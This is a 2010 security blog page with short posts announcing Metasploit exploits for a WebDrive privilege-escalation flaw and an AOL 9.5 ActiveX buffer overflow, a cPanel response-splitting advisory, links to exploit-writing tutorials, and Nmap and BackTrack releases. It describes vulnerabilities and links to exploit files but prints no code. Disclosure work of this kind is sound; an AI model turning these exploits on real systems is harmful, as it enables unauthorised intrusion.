Recognize-Security

Posted by Trancer on Jan 26 2010

Here’s a local privilege escalation exploit I wrote, as a Metasploit Meterpreter script, for the South River Technologies WebDrive Service Bad Security Descriptor vulnerability.

This vulnerability was discovered by bellick of the Nine:Situations:Group and the original advisory can be found on the Nine:Situations:Group web site – South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges.
As you can understand from the advisory, local elevation of privileges is possible due to bad (empty actually) security descriptor of the South River Technologies WebDrive service.

This exploit was inspired by MC‘s HP PML Driver HPZ12 privilege escalation exploit.
In this exploit I’ve also added a mitigation option, which will set correct service security descriptor configuration for SRT WebDrive. Note that the vulnerability is still unpatched, exploit tested on the latest version of SRT WebDrive.

The exploit was successfully tested on the following platforms:
– South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.

Download srt_webdrive_priv.rb.
Also on Metasploit and exploit-db.

References:
CVE-2009-4606
OSVDB 59080
BID 37955
exploit-db 9970

Categories: Exploits • Metasploit

1 Comments | Comments RSS | TrackBack URL

---

Posted by Trancer on Jan 25 2010

Wrote a new Metaspoit exploit module for the AOL 9.5 Phobos.Playlist ActiveX control Import() stack-based buffer overflow vulnerability.

This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5. By setting an overly long value to ‘Import()’, an attacker can overrun a buffer and execute arbitrary code.

This vulnerability was found by Hellcode Research and was published recently by Dz_attacker. Still no patch from AOL, if you want to test it you can get the vulnerable package from the AOL 9.5 page.

The exploit was successfully tested on the following platforms:
– AOL 9.5 (Revision 4337.155) on Internet Explorer 7, Windows XP SP3

Phobos.dll version tested:
– File Version: 9.5.0.1
– ClassID: A105BD70-BF56-4D10-BC91-41C88321F47C
– RegKey Safe for Script: False
– RegKey Safe for Init: False
– Implements IObjectSafety: False
– KillBitSet: False

Due to the safe for initialization and safe for scripting settings of this ActiveX control, exploitation is possible only from Local Machine Zone, which means the victim must run the generated exploit file locally.

Download aol_phobos_bof.rb.
Also on Metasploit and exploit-db.

References:
OSVDB 61964
exploit-db 11204

Categories: Exploits • Metasploit

0 Comments | Comments RSS | TrackBack URL

---

Posted by Trancer on Jan 22 2010

Hello everyone. If your in to exploit development or new to this and want to learn how to do it, here’s a series of tutorials by Peter Van Eeckhoutte (a.k.a corelanc0d3r), which I strongly recommend, that will give you solid knowledge in exploit writing.
Today Peter published the latest edition to his exploit writing tutorials about Win32 Egg Hunting. Check it out:

• Exploit writing tutorial part 1 : Stack Based Overflows
• Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode
• Exploit writing tutorial part 3 : SEH Based Exploits
• Exploit writing tutorial part 3b : SEH Based Exploits – just another example
• Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics
• Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development
• Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR
• Exploit writing tutorial part 7 : Unicode – from 0×00410041 to calc
• Exploit writing tutorial part 8 : Win32 Egg Hunting
• Exploit writing tutorial part 9 : Introduction to Win32 shellcoding
• Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s[TM] Cube

Enjoy the reading!

Categories: Exploitation

1 Comments | Comments RSS | TrackBack URL

---

Posted by Trancer on Jan 21 2010

Hello readers,
From now on you can follow Recognize-Security on Twitter!
Check it out – @rec_sec

Categories: Rec-Sec

2 Comments | Comments RSS | TrackBack URL

---

Posted by Trancer on Jan 21 2010

Security Advisory for cPanel and WHM (WebHost Manager) versions 11.25.
Vulnerabilities found:

• HTTP Response Splitting vulnerability
• Open Redirection vulnerability

cPanel HTTP Response Splitting Vulnerability – Security Advisory (PDF).
cPanel HTTP Response Splitting Vulnerability – Security Advisory (TXT).

I’d like to point out the lame work of the cPanel Security Team on these vulnerabilities. Usually when I report a vulnerability, I get some kind of interaction with the vendor developers and/or the security team, most of the times I enjoy working with the people involved. In this case, the cPanel Security Team were unresponsive. Eventually I was forced to release the security advisory even though one of the vulnerabilities (the Open Redirection vulnerability) is still unpatched.

References:
BID 37902
OSVDB 61954
exploit-db 11211

Categories: Advisories • Web Application Security

3 Comments | Comments RSS | TrackBack URL

---

Posted by Trancer on Jan 21 2010

A new version of Nmap Security Scanner released today which is the first stable release since 5.00 – Nmap 5.20.
This version got tons of improvements such as improved UDP scanning, new Nmap Scripting Engine scripts, updated OS and version detection and more.
Check out the Change log and announcement of Nmap 5.20.
Download Nmap 5.20.

Categories: Tools

0 Comments | Comments RSS | TrackBack URL

---

Posted by Trancer on Jan 21 2010

A new version for the penetration testers and security experts favorite Linux distrobution released – BackTrack Linux 4.

This version offers new tools, new kernel and tons of bug fixes. And, BackTrack Linux is no longer a part of remote-exploit.org, it got a new home at backtrack-linux.org.

I used the new version for the last couple of days and find it to be very useful and cool, recommended!
Download BackTrack Linux 4.

Categories: Tools

1 Comments | Comments RSS | TrackBack URL

---